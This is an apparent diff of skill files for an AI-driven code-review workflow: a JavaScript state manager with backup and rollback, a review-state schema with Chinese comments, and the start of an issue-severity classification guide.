||||
- **Change history** - Track all state modifications
|
||||
|
||||
## File Structure
|
||||
|
||||
```
|
||||
{workDir}/
|
||||
state.json # Current state
|
||||
state.backup.json # Latest backup
|
||||
state-history.json # Change history log
|
||||
```
|
||||
|
||||
## API Reference
|
||||
|
||||
### initState(workDir)
|
||||
|
||||
Initialize a new state file with default values.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Initialize state file with default structure
|
||||
* @param {string} workDir - Working directory path
|
||||
* @returns {object} - Initial state object
|
||||
*/
|
||||
function initState(workDir) {
|
||||
const now = new Date().toISOString();
|
||||
|
||||
const initialState = {
|
||||
status: 'pending',
|
||||
started_at: now,
|
||||
updated_at: now,
|
||||
context: null,
|
||||
scan_completed: false,
|
||||
scan_summary: null,
|
||||
reviewed_dimensions: [],
|
||||
current_dimension: null,
|
||||
findings: {
|
||||
correctness: [],
|
||||
readability: [],
|
||||
performance: [],
|
||||
security: [],
|
||||
testing: [],
|
||||
architecture: []
|
||||
},
|
||||
report_generated: false,
|
||||
report_path: null,
|
||||
current_action: null,
|
||||
completed_actions: [],
|
||||
errors: [],
|
||||
error_count: 0,
|
||||
summary: null
|
||||
};
|
||||
|
||||
// Write state file
|
||||
const statePath = `${workDir}/state.json`;
|
||||
Write(statePath, JSON.stringify(initialState, null, 2));
|
||||
|
||||
// Initialize history log
|
||||
const historyPath = `${workDir}/state-history.json`;
|
||||
const historyEntry = {
|
||||
entries: [{
|
||||
timestamp: now,
|
||||
action: 'init',
|
||||
changes: { type: 'initialize', status: 'pending' }
|
||||
}]
|
||||
};
|
||||
Write(historyPath, JSON.stringify(historyEntry, null, 2));
|
||||
|
||||
console.log(`[StateManager] Initialized state at ${statePath}`);
|
||||
return initialState;
|
||||
}
|
||||
```
|
||||
|
||||
### getState(workDir)
|
||||
|
||||
Read and parse current state from file.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Read current state from file
|
||||
* @param {string} workDir - Working directory path
|
||||
* @returns {object|null} - Current state or null if not found
|
||||
*/
|
||||
function getState(workDir) {
|
||||
const statePath = `${workDir}/state.json`;
|
||||
|
||||
try {
|
||||
const content = Read(statePath);
|
||||
const state = JSON.parse(content);
|
||||
|
||||
// Validate structure before returning
|
||||
const validation = validateState(state);
|
||||
if (!validation.valid) {
|
||||
console.warn(`[StateManager] State validation warnings: ${validation.warnings.join(', ')}`);
|
||||
}
|
||||
|
||||
return state;
|
||||
} catch (error) {
|
||||
console.error(`[StateManager] Failed to read state: ${error.message}`);
|
||||
return null;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### updateState(workDir, updates)
|
||||
|
||||
Safely update state with atomic write and automatic backup.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Safely update state with atomic write
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {object} updates - Partial state updates to apply
|
||||
* @returns {object} - Updated state object
|
||||
* @throws {Error} - If update fails (automatically rolls back)
|
||||
*/
|
||||
function updateState(workDir, updates) {
|
||||
const statePath = `${workDir}/state.json`;
|
||||
const tempPath = `${workDir}/state.tmp.json`;
|
||||
const backupPath = `${workDir}/state.backup.json`;
|
||||
const historyPath = `${workDir}/state-history.json`;
|
||||
|
||||
// Step 1: Read current state
|
||||
let currentState;
|
||||
try {
|
||||
currentState = JSON.parse(Read(statePath));
|
||||
} catch (error) {
|
||||
throw new Error(`Cannot read current state: ${error.message}`);
|
||||
}
|
||||
|
||||
// Step 2: Create backup before any modification
|
||||
try {
|
||||
Write(backupPath, JSON.stringify(currentState, null, 2));
|
||||
} catch (error) {
|
||||
throw new Error(`Cannot create backup: ${error.message}`);
|
||||
}
|
||||
|
||||
// Step 3: Merge updates
|
||||
const now = new Date().toISOString();
|
||||
const newState = deepMerge(currentState, {
|
||||
...updates,
|
||||
updated_at: now
|
||||
});
|
||||
|
||||
// Step 4: Validate new state
|
||||
const validation = validateState(newState);
|
||||
if (!validation.valid && validation.errors.length > 0) {
|
||||
throw new Error(`Invalid state after update: ${validation.errors.join(', ')}`);
|
||||
}
|
||||
|
||||
// Step 5: Write to temp file first (atomic preparation)
|
||||
try {
|
||||
Write(tempPath, JSON.stringify(newState, null, 2));
|
||||
} catch (error) {
|
||||
throw new Error(`Cannot write temp state: ${error.message}`);
|
||||
}
|
||||
|
||||
// Step 6: Atomic rename (replace original with temp)
|
||||
try {
|
||||
// Read temp and write to original (simulating atomic rename)
|
||||
const tempContent = Read(tempPath);
|
||||
Write(statePath, tempContent);
|
||||
|
||||
// Clean up temp file
|
||||
Bash(`rm -f "${tempPath}"`);
|
||||
} catch (error) {
|
||||
// Rollback: restore from backup
|
||||
console.error(`[StateManager] Update failed, rolling back: ${error.message}`);
|
||||
try {
|
||||
const backup = Read(backupPath);
|
||||
Write(statePath, backup);
|
||||
} catch (rollbackError) {
|
||||
throw new Error(`Critical: Update failed and rollback failed: ${rollbackError.message}`);
|
||||
}
|
||||
throw new Error(`Update failed, rolled back: ${error.message}`);
|
||||
}
|
||||
|
||||
// Step 7: Record in history
|
||||
try {
|
||||
let history = { entries: [] };
|
||||
try {
|
||||
history = JSON.parse(Read(historyPath));
|
||||
} catch (e) {
|
||||
// History file may not exist, start fresh
|
||||
}
|
||||
|
||||
history.entries.push({
|
||||
timestamp: now,
|
||||
action: 'update',
|
||||
changes: summarizeChanges(currentState, newState, updates)
|
||||
});
|
||||
|
||||
// Keep only last 100 entries
|
||||
if (history.entries.length > 100) {
|
||||
history.entries = history.entries.slice(-100);
|
||||
}
|
||||
|
||||
Write(historyPath, JSON.stringify(history, null, 2));
|
||||
} catch (error) {
|
||||
// History logging failure is non-critical
|
||||
console.warn(`[StateManager] Failed to log history: ${error.message}`);
|
||||
}
|
||||
|
||||
console.log(`[StateManager] State updated successfully`);
|
||||
return newState;
|
||||
}
|
||||
|
||||
/**
|
||||
* Deep merge helper - merges nested objects
|
||||
*/
|
||||
function deepMerge(target, source) {
|
||||
const result = { ...target };
|
||||
|
||||
for (const key of Object.keys(source)) {
|
||||
if (source[key] === null || source[key] === undefined) {
|
||||
result[key] = source[key];
|
||||
} else if (Array.isArray(source[key])) {
|
||||
result[key] = source[key];
|
||||
} else if (typeof source[key] === 'object' && typeof target[key] === 'object') {
|
||||
result[key] = deepMerge(target[key], source[key]);
|
||||
} else {
|
||||
result[key] = source[key];
|
||||
}
|
||||
}
|
||||
|
||||
return result;
|
||||
}
|
||||
|
||||
/**
|
||||
* Summarize changes for history logging
|
||||
*/
|
||||
function summarizeChanges(oldState, newState, updates) {
|
||||
const changes = {};
|
||||
|
||||
for (const key of Object.keys(updates)) {
|
||||
if (key === 'updated_at') continue;
|
||||
|
||||
const oldVal = oldState[key];
|
||||
const newVal = newState[key];
|
||||
|
||||
if (JSON.stringify(oldVal) !== JSON.stringify(newVal)) {
|
||||
changes[key] = {
|
||||
from: typeof oldVal === 'object' ? '[object]' : oldVal,
|
||||
to: typeof newVal === 'object' ? '[object]' : newVal
|
||||
};
|
||||
}
|
||||
}
|
||||
|
||||
return changes;
|
||||
}
|
||||
```
|
||||
|
||||
### validateState(state)
|
||||
|
||||
Validate state structure against schema.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Validate state structure
|
||||
* @param {object} state - State object to validate
|
||||
* @returns {object} - { valid: boolean, errors: string[], warnings: string[] }
|
||||
*/
|
||||
function validateState(state) {
|
||||
const errors = [];
|
||||
const warnings = [];
|
||||
|
||||
// Required fields
|
||||
const requiredFields = ['status', 'started_at', 'updated_at'];
|
||||
for (const field of requiredFields) {
|
||||
if (state[field] === undefined) {
|
||||
errors.push(`Missing required field: ${field}`);
|
||||
}
|
||||
}
|
||||
|
||||
// Status validation
|
||||
const validStatuses = ['pending', 'running', 'completed', 'failed', 'user_exit'];
|
||||
if (state.status && !validStatuses.includes(state.status)) {
|
||||
errors.push(`Invalid status: ${state.status}. Must be one of: ${validStatuses.join(', ')}`);
|
||||
}
|
||||
|
||||
// Timestamp format validation
|
||||
const timestampFields = ['started_at', 'updated_at', 'completed_at'];
|
||||
for (const field of timestampFields) {
|
||||
if (state[field] && !isValidISOTimestamp(state[field])) {
|
||||
warnings.push(`Invalid timestamp format for ${field}`);
|
||||
}
|
||||
}
|
||||
|
||||
// Findings structure validation
|
||||
if (state.findings) {
|
||||
const expectedDimensions = ['correctness', 'readability', 'performance', 'security', 'testing', 'architecture'];
|
||||
for (const dim of expectedDimensions) {
|
||||
if (!Array.isArray(state.findings[dim])) {
|
||||
warnings.push(`findings.${dim} should be an array`);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Context validation (when present)
|
||||
if (state.context !== null && state.context !== undefined) {
|
||||
const contextFields = ['target_path', 'files', 'language', 'total_lines', 'file_count'];
|
||||
for (const field of contextFields) {
|
||||
if (state.context[field] === undefined) {
|
||||
warnings.push(`context.${field} is missing`);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Error count validation
|
||||
if (typeof state.error_count !== 'number') {
|
||||
warnings.push('error_count should be a number');
|
||||
}
|
||||
|
||||
// Array fields validation
|
||||
const arrayFields = ['reviewed_dimensions', 'completed_actions', 'errors'];
|
||||
for (const field of arrayFields) {
|
||||
if (state[field] !== undefined && !Array.isArray(state[field])) {
|
||||
errors.push(`${field} must be an array`);
|
||||
}
|
||||
}
|
||||
|
||||
return {
|
||||
valid: errors.length === 0,
|
||||
errors,
|
||||
warnings
|
||||
};
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if string is valid ISO timestamp
|
||||
*/
|
||||
function isValidISOTimestamp(str) {
|
||||
if (typeof str !== 'string') return false;
|
||||
const date = new Date(str);
|
||||
return !isNaN(date.getTime()) && str.includes('T');
|
||||
}
|
||||
```
|
||||
|
||||
### backupState(workDir)
|
||||
|
||||
Create a manual backup of current state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Create a manual backup of current state
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} [suffix] - Optional suffix for backup file name
|
||||
* @returns {string} - Backup file path
|
||||
*/
|
||||
function backupState(workDir, suffix = null) {
|
||||
const statePath = `${workDir}/state.json`;
|
||||
const timestamp = new Date().toISOString().replace(/[:.]/g, '-');
|
||||
const backupName = suffix
|
||||
? `state.backup.${suffix}.json`
|
||||
: `state.backup.${timestamp}.json`;
|
||||
const backupPath = `${workDir}/${backupName}`;
|
||||
|
||||
try {
|
||||
const content = Read(statePath);
|
||||
Write(backupPath, content);
|
||||
console.log(`[StateManager] Backup created: ${backupPath}`);
|
||||
return backupPath;
|
||||
} catch (error) {
|
||||
throw new Error(`Failed to create backup: ${error.message}`);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### restoreState(workDir, backupPath)
|
||||
|
||||
Restore state from a backup file.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Restore state from a backup file
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} [backupPath] - Path to backup file (default: latest backup)
|
||||
* @returns {object} - Restored state object
|
||||
*/
|
||||
function restoreState(workDir, backupPath = null) {
|
||||
const statePath = `${workDir}/state.json`;
|
||||
const defaultBackup = `${workDir}/state.backup.json`;
|
||||
const historyPath = `${workDir}/state-history.json`;
|
||||
|
||||
const sourcePath = backupPath || defaultBackup;
|
||||
|
||||
try {
|
||||
// Read backup
|
||||
const backupContent = Read(sourcePath);
|
||||
const backupState = JSON.parse(backupContent);
|
||||
|
||||
// Validate backup state
|
||||
const validation = validateState(backupState);
|
||||
if (!validation.valid) {
|
||||
throw new Error(`Backup state is invalid: ${validation.errors.join(', ')}`);
|
||||
}
|
||||
|
||||
// Create backup of current state before restore (for safety)
|
||||
try {
|
||||
const currentContent = Read(statePath);
|
||||
Write(`${workDir}/state.pre-restore.json`, currentContent);
|
||||
} catch (e) {
|
||||
// Current state may not exist, that's okay
|
||||
}
|
||||
|
||||
// Update timestamp
|
||||
const now = new Date().toISOString();
|
||||
backupState.updated_at = now;
|
||||
|
||||
// Write restored state
|
||||
Write(statePath, JSON.stringify(backupState, null, 2));
|
||||
|
||||
// Log to history
|
||||
try {
|
||||
let history = { entries: [] };
|
||||
try {
|
||||
history = JSON.parse(Read(historyPath));
|
||||
} catch (e) {}
|
||||
|
||||
history.entries.push({
|
||||
timestamp: now,
|
||||
action: 'restore',
|
||||
changes: { source: sourcePath }
|
||||
});
|
||||
|
||||
Write(historyPath, JSON.stringify(history, null, 2));
|
||||
} catch (e) {
|
||||
console.warn(`[StateManager] Failed to log restore to history`);
|
||||
}
|
||||
|
||||
console.log(`[StateManager] State restored from ${sourcePath}`);
|
||||
return backupState;
|
||||
} catch (error) {
|
||||
throw new Error(`Failed to restore state: ${error.message}`);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Convenience Functions
|
||||
|
||||
### getNextDimension(state)
|
||||
|
||||
Get the next dimension to review based on current state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Get next dimension to review
|
||||
* @param {object} state - Current state
|
||||
* @returns {string|null} - Next dimension or null if all reviewed
|
||||
*/
|
||||
function getNextDimension(state) {
|
||||
const dimensions = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
|
||||
const reviewed = state.reviewed_dimensions || [];
|
||||
|
||||
for (const dim of dimensions) {
|
||||
if (!reviewed.includes(dim)) {
|
||||
return dim;
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
```
|
||||
|
||||
### addFinding(workDir, finding)
|
||||
|
||||
Add a new finding to the state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Add a finding to the appropriate dimension
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {object} finding - Finding object (must include dimension field)
|
||||
* @returns {object} - Updated state
|
||||
*/
|
||||
function addFinding(workDir, finding) {
|
||||
if (!finding.dimension) {
|
||||
throw new Error('Finding must have a dimension field');
|
||||
}
|
||||
|
||||
const state = getState(workDir);
|
||||
const dimension = finding.dimension;
|
||||
|
||||
// Generate ID if not provided
|
||||
if (!finding.id) {
|
||||
const prefixes = {
|
||||
correctness: 'CORR',
|
||||
readability: 'READ',
|
||||
performance: 'PERF',
|
||||
security: 'SEC',
|
||||
testing: 'TEST',
|
||||
architecture: 'ARCH'
|
||||
};
|
||||
const prefix = prefixes[dimension] || 'MISC';
|
||||
const count = (state.findings[dimension]?.length || 0) + 1;
|
||||
finding.id = `${prefix}-${String(count).padStart(3, '0')}`;
|
||||
}
|
||||
|
||||
const currentFindings = state.findings[dimension] || [];
|
||||
|
||||
return updateState(workDir, {
|
||||
findings: {
|
||||
...state.findings,
|
||||
[dimension]: [...currentFindings, finding]
|
||||
}
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
### markDimensionComplete(workDir, dimension)
|
||||
|
||||
Mark a dimension as reviewed.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Mark a dimension as reviewed
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} dimension - Dimension name
|
||||
* @returns {object} - Updated state
|
||||
*/
|
||||
function markDimensionComplete(workDir, dimension) {
|
||||
const state = getState(workDir);
|
||||
const reviewed = state.reviewed_dimensions || [];
|
||||
|
||||
if (reviewed.includes(dimension)) {
|
||||
console.warn(`[StateManager] Dimension ${dimension} already marked as reviewed`);
|
||||
return state;
|
||||
}
|
||||
|
||||
return updateState(workDir, {
|
||||
reviewed_dimensions: [...reviewed, dimension],
|
||||
current_dimension: null
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
### recordError(workDir, action, message)
|
||||
|
||||
Record an error in state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Record an execution error
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} action - Action that failed
|
||||
* @param {string} message - Error message
|
||||
* @returns {object} - Updated state
|
||||
*/
|
||||
function recordError(workDir, action, message) {
|
||||
const state = getState(workDir);
|
||||
const errors = state.errors || [];
|
||||
const errorCount = (state.error_count || 0) + 1;
|
||||
|
||||
const newError = {
|
||||
action,
|
||||
message,
|
||||
timestamp: new Date().toISOString()
|
||||
};
|
||||
|
||||
const newState = updateState(workDir, {
|
||||
errors: [...errors, newError],
|
||||
error_count: errorCount
|
||||
});
|
||||
|
||||
// Auto-fail if error count exceeds threshold
|
||||
if (errorCount >= 3) {
|
||||
return updateState(workDir, {
|
||||
status: 'failed'
|
||||
});
|
||||
}
|
||||
|
||||
return newState;
|
||||
}
|
||||
```
|
||||
|
||||
## Usage Examples
|
||||
|
||||
### Initialize and Run Review
|
||||
|
||||
```javascript
|
||||
// Initialize new review session
|
||||
const workDir = '/path/to/review-session';
|
||||
const state = initState(workDir);
|
||||
|
||||
// Update status to running
|
||||
updateState(workDir, { status: 'running' });
|
||||
|
||||
// After collecting context
|
||||
updateState(workDir, {
|
||||
context: {
|
||||
target_path: '/src/auth',
|
||||
files: ['auth.ts', 'login.ts'],
|
||||
language: 'typescript',
|
||||
total_lines: 500,
|
||||
file_count: 2
|
||||
}
|
||||
});
|
||||
|
||||
// After completing quick scan
|
||||
updateState(workDir, {
|
||||
scan_completed: true,
|
||||
scan_summary: {
|
||||
risk_areas: [{ file: 'auth.ts', reason: 'Complex logic', priority: 'high' }],
|
||||
complexity_score: 7.5,
|
||||
quick_issues: []
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
### Add Findings During Review
|
||||
|
||||
```javascript
|
||||
// Add a security finding
|
||||
addFinding(workDir, {
|
||||
dimension: 'security',
|
||||
severity: 'high',
|
||||
category: 'injection',
|
||||
file: 'auth.ts',
|
||||
line: 45,
|
||||
description: 'SQL injection vulnerability',
|
||||
recommendation: 'Use parameterized queries'
|
||||
});
|
||||
|
||||
// Mark dimension complete
|
||||
markDimensionComplete(workDir, 'security');
|
||||
```
|
||||
|
||||
### Error Handling with Rollback
|
||||
|
||||
```javascript
|
||||
try {
|
||||
updateState(workDir, {
|
||||
status: 'running',
|
||||
current_action: 'deep-review'
|
||||
});
|
||||
|
||||
// ... do review work ...
|
||||
|
||||
} catch (error) {
|
||||
// Record error
|
||||
recordError(workDir, 'deep-review', error.message);
|
||||
|
||||
// If needed, restore from backup
|
||||
restoreState(workDir);
|
||||
}
|
||||
```
|
||||
|
||||
### Check Review Progress
|
||||
|
||||
```javascript
|
||||
const state = getState(workDir);
|
||||
const nextDim = getNextDimension(state);
|
||||
|
||||
if (nextDim) {
|
||||
console.log(`Next dimension to review: ${nextDim}`);
|
||||
updateState(workDir, { current_dimension: nextDim });
|
||||
} else {
|
||||
console.log('All dimensions reviewed');
|
||||
}
|
||||
```
|
||||
|
||||
## Integration with Orchestrator
|
||||
|
||||
Update the orchestrator to use StateManager:
|
||||
|
||||
```javascript
|
||||
// In orchestrator.md - Replace direct state operations with StateManager calls
|
||||
|
||||
// OLD:
|
||||
const state = JSON.parse(Read(`${workDir}/state.json`));
|
||||
|
||||
// NEW:
|
||||
const state = getState(workDir);
|
||||
|
||||
// OLD:
|
||||
function updateState(updates) {
|
||||
const state = JSON.parse(Read(`${workDir}/state.json`));
|
||||
const newState = { ...state, ...updates, updated_at: new Date().toISOString() };
|
||||
Write(`${workDir}/state.json`, JSON.stringify(newState, null, 2));
|
||||
return newState;
|
||||
}
|
||||
|
||||
// NEW:
|
||||
// Import from state-manager.md
|
||||
// updateState(workDir, updates) - handles atomic write, backup, validation
|
||||
|
||||
// Error handling - OLD:
|
||||
updateState({
|
||||
errors: [...(state.errors || []), { action: actionId, message: error.message, timestamp: new Date().toISOString() }],
|
||||
error_count: (state.error_count || 0) + 1
|
||||
});
|
||||
|
||||
// Error handling - NEW:
|
||||
recordError(workDir, actionId, error.message);
|
||||
```
|
||||
|
||||
## State History Format
|
||||
|
||||
The `state-history.json` file tracks all state changes:
|
||||
|
||||
```json
|
||||
{
|
||||
"entries": [
|
||||
{
|
||||
"timestamp": "2024-01-01T10:00:00.000Z",
|
||||
"action": "init",
|
||||
"changes": { "type": "initialize", "status": "pending" }
|
||||
},
|
||||
{
|
||||
"timestamp": "2024-01-01T10:01:00.000Z",
|
||||
"action": "update",
|
||||
"changes": {
|
||||
"status": { "from": "pending", "to": "running" },
|
||||
"current_action": { "from": null, "to": "action-collect-context" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"timestamp": "2024-01-01T10:05:00.000Z",
|
||||
"action": "restore",
|
||||
"changes": { "source": "/path/state.backup.json" }
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Error Recovery Strategies
|
||||
|
||||
| Scenario | Strategy | Function |
|
||||
|----------|----------|----------|
|
||||
| State file corrupted | Restore from backup | `restoreState(workDir)` |
|
||||
| Invalid state after update | Auto-rollback (built-in) | N/A (automatic) |
|
||||
| Multiple errors | Auto-fail after 3 | `recordError()` |
|
||||
| Need to retry from checkpoint | Restore specific backup | `restoreState(workDir, backupPath)` |
|
||||
| Review interrupted | Resume from saved state | `getState(workDir)` |
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Always use `updateState()`** - Never write directly to state.json
|
||||
2. **Check validation warnings** - Warnings may indicate data issues
|
||||
3. **Use convenience functions** - `addFinding()`, `markDimensionComplete()`, etc.
|
||||
4. **Monitor history** - Check state-history.json for debugging
|
||||
5. **Create named backups** - Before major operations: `backupState(workDir, 'pre-deep-review')`
|
||||
174
.claude/skills/review-code/phases/state-schema.md
Normal file
@@ -0,0 +1,174 @@
|
||||
# State Schema
|
||||
|
||||
Code Review 状态结构定义。
|
||||
|
||||
## Schema Definition
|
||||
|
||||
```typescript
|
||||
interface ReviewState {
|
||||
// === 元数据 ===
|
||||
status: 'pending' | 'running' | 'completed' | 'failed' | 'user_exit';
|
||||
started_at: string; // ISO timestamp
|
||||
updated_at: string; // ISO timestamp
|
||||
completed_at?: string; // ISO timestamp
|
||||
|
||||
// === 审查目标 ===
|
||||
context: {
|
||||
target_path: string; // 目标路径(文件或目录)
|
||||
files: string[]; // 待审查文件列表
|
||||
language: string; // 主要编程语言
|
||||
framework?: string; // 框架(如有)
|
||||
total_lines: number; // 总代码行数
|
||||
file_count: number; // 文件数量
|
||||
};
|
||||
|
||||
// === 扫描结果 ===
|
||||
scan_completed: boolean;
|
||||
scan_summary: {
|
||||
risk_areas: RiskArea[]; // 高风险区域
|
||||
complexity_score: number; // 复杂度评分
|
||||
quick_issues: QuickIssue[]; // 快速发现的问题
|
||||
};
|
||||
|
||||
// === 审查进度 ===
|
||||
reviewed_dimensions: string[]; // 已完成的审查维度
|
||||
current_dimension?: string; // 当前审查维度
|
||||
|
||||
// === 发现的问题 ===
|
||||
findings: {
|
||||
correctness: Finding[];
|
||||
readability: Finding[];
|
||||
performance: Finding[];
|
||||
security: Finding[];
|
||||
testing: Finding[];
|
||||
architecture: Finding[];
|
||||
};
|
||||
|
||||
// === 报告状态 ===
|
||||
report_generated: boolean;
|
||||
report_path?: string;
|
||||
|
||||
// === 执行跟踪 ===
|
||||
current_action?: string;
|
||||
completed_actions: string[];
|
||||
errors: ExecutionError[];
|
||||
error_count: number;
|
||||
|
||||
// === 统计信息 ===
|
||||
summary?: {
|
||||
total_issues: number;
|
||||
critical: number;
|
||||
high: number;
|
||||
medium: number;
|
||||
low: number;
|
||||
info: number;
|
||||
review_duration_ms: number;
|
||||
};
|
||||
}
|
||||
|
||||
interface RiskArea {
|
||||
file: string;
|
||||
reason: string;
|
||||
priority: 'high' | 'medium' | 'low';
|
||||
}
|
||||
|
||||
interface QuickIssue {
|
||||
type: string;
|
||||
file: string;
|
||||
line?: number;
|
||||
message: string;
|
||||
}
|
||||
|
||||
interface Finding {
|
||||
id: string; // 唯一标识 e.g., "CORR-001"
|
||||
severity: 'critical' | 'high' | 'medium' | 'low' | 'info';
|
||||
dimension: string; // 所属维度
|
||||
category: string; // 问题类别
|
||||
file: string; // 文件路径
|
||||
line?: number; // 行号
|
||||
column?: number; // 列号
|
||||
code_snippet?: string; // 问题代码片段
|
||||
description: string; // 问题描述
|
||||
recommendation: string; // 修复建议
|
||||
fix_example?: string; // 修复示例代码
|
||||
references?: string[]; // 参考资料链接
|
||||
}
|
||||
|
||||
interface ExecutionError {
|
||||
action: string;
|
||||
message: string;
|
||||
timestamp: string;
|
||||
}
|
||||
```
|
||||
|
||||
## Initial State
|
||||
|
||||
```json
|
||||
{
|
||||
"status": "pending",
|
||||
"started_at": "2024-01-01T00:00:00.000Z",
|
||||
"updated_at": "2024-01-01T00:00:00.000Z",
|
||||
"context": null,
|
||||
"scan_completed": false,
|
||||
"scan_summary": null,
|
||||
"reviewed_dimensions": [],
|
||||
"current_dimension": null,
|
||||
"findings": {
|
||||
"correctness": [],
|
||||
"readability": [],
|
||||
"performance": [],
|
||||
"security": [],
|
||||
"testing": [],
|
||||
"architecture": []
|
||||
},
|
||||
"report_generated": false,
|
||||
"report_path": null,
|
||||
"current_action": null,
|
||||
"completed_actions": [],
|
||||
"errors": [],
|
||||
"error_count": 0,
|
||||
"summary": null
|
||||
}
|
||||
```
|
||||
|
||||
## State Transitions
|
||||
|
||||
```mermaid
|
||||
stateDiagram-v2
|
||||
[*] --> pending: Initialize
|
||||
pending --> running: collect-context
|
||||
running --> running: quick-scan
|
||||
running --> running: deep-review (6x)
|
||||
running --> running: generate-report
|
||||
running --> completed: complete
|
||||
running --> failed: error_count >= 3
|
||||
running --> user_exit: User abort
|
||||
completed --> [*]
|
||||
failed --> [*]
|
||||
user_exit --> [*]
|
||||
```
|
||||
|
||||
## Dimension Review Order
|
||||
|
||||
1. **correctness** - 正确性(最高优先级)
|
||||
2. **security** - 安全性(关键)
|
||||
3. **performance** - 性能
|
||||
4. **readability** - 可读性
|
||||
5. **testing** - 测试覆盖
|
||||
6. **architecture** - 架构一致性
|
||||
|
||||
## Finding ID Format
|
||||
|
||||
```
|
||||
{DIMENSION_PREFIX}-{SEQUENCE}
|
||||
|
||||
Prefixes:
|
||||
- CORR: Correctness
|
||||
- READ: Readability
|
||||
- PERF: Performance
|
||||
- SEC: Security
|
||||
- TEST: Testing
|
||||
- ARCH: Architecture
|
||||
|
||||
Example: SEC-003 = Security issue #3
|
||||
```
|
||||
228
.claude/skills/review-code/specs/issue-classification.md
Normal file
@@ -0,0 +1,228 @@
|
||||
# Issue Classification
|
||||
|
||||
问题分类和严重程度标准。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| action-deep-review | 确定问题严重程度 | Severity Levels |
|
||||
| action-generate-report | 问题分类展示 | Category Mapping |
|
||||
|
||||
---
|
||||
|
||||
## Severity Levels
|
||||
|
||||
### Critical (严重) 🔴
|
||||
|
||||
**定义**: 必须在合并前修复的阻塞性问题
|
||||
|
||||
**标准**:
|
||||
- 安全漏洞 (可被利用)
|
||||
- 数据损坏或丢失风险
|
||||
- 系统崩溃风险
|
||||
- 生产环境重大故障
|
||||
|
||||
**示例**:
|
||||
- SQL/XSS/命令注入
|
||||
- 硬编码密钥泄露
|
||||
- 未捕获的异常导致崩溃
|
||||
- 数据库事务未正确处理
|
||||
|
||||
**响应**: 必须立即修复,阻塞合并
|
||||
|
||||
---
|
||||
|
||||
### High (高) 🟠
|
||||
|
||||
**定义**: 应在合并前修复的重要问题
|
||||
|
||||
**标准**:
|
||||
- 功能缺陷
|
||||
- 重要边界条件未处理
|
||||
- 性能严重退化
|
||||
- 资源泄漏
|
||||
|
||||
**示例**:
|
||||
- 核心业务逻辑错误
|
||||
- 内存泄漏
|
||||
- N+1 查询问题
|
||||
- 缺少必要的错误处理
|
||||
|
||||
**响应**: 强烈建议修复
|
||||
|
||||
---
|
||||
|
||||
### Medium (中) 🟡
|
||||
|
||||
**定义**: 建议修复的代码质量问题
|
||||
|
||||
**标准**:
|
||||
- 代码可维护性问题
|
||||
- 轻微性能问题
|
||||
- 测试覆盖不足
|
||||
- 不符合团队规范
|
||||
|
||||
**示例**:
|
||||
- 函数过长
|
||||
- 命名不清晰
|
||||
- 缺少注释
|
||||
- 代码重复
|
||||
|
||||
**响应**: 建议在后续迭代修复
|
||||
|
||||
---
|
||||
|
||||
### Low (低) 🔵
|
||||
|
||||
**定义**: 可选优化的问题
|
||||
|
||||
**标准**:
|
||||
- 风格问题
|
||||
- 微小优化
|
||||
- 可读性改进
|
||||
|
||||
**示例**:
|
||||
- 变量声明顺序
|
||||
- 额外的空行
|
||||
- 可以更简洁的写法
|
||||
|
||||
**响应**: 可根据团队偏好处理
|
||||
|
||||
---
|
||||
|
||||
### Info (信息) ⚪
|
||||
|
||||
**定义**: 信息性建议,非问题
|
||||
|
||||
**标准**:
|
||||
- 学习机会
|
||||
- 替代方案建议
|
||||
- 文档完善建议
|
||||
|
||||
**示例**:
|
||||
- "这里可以考虑使用新的 API"
|
||||
- "建议添加 JSDoc 注释"
|
||||
- "可以参考 xxx 模式"
|
||||
|
||||
**响应**: 仅供参考
|
||||
|
||||
---
|
||||
|
||||
## Category Mapping
|
||||
|
||||
### By Dimension
|
||||
|
||||
| Dimension | Common Categories |
|
||||
|-----------|-------------------|
|
||||
| Correctness | `null-check`, `boundary`, `error-handling`, `type-safety`, `logic-error` |
|
||||
| Security | `injection`, `xss`, `hardcoded-secret`, `auth`, `sensitive-data` |
|
||||
| Performance | `complexity`, `n+1-query`, `memory-leak`, `blocking-io`, `inefficient-algorithm` |
|
||||
| Readability | `naming`, `function-length`, `complexity`, `comments`, `duplication` |
|
||||
| Testing | `coverage`, `boundary-test`, `mock-abuse`, `test-isolation` |
|
||||
| Architecture | `layer-violation`, `circular-dependency`, `coupling`, `srp-violation` |
|
||||
|
||||
### Category Details
|
||||
|
||||
#### Correctness Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `null-check` | 缺少空值检查 | High |
|
||||
| `boundary` | 边界条件未处理 | High |
|
||||
| `error-handling` | 错误处理不当 | High |
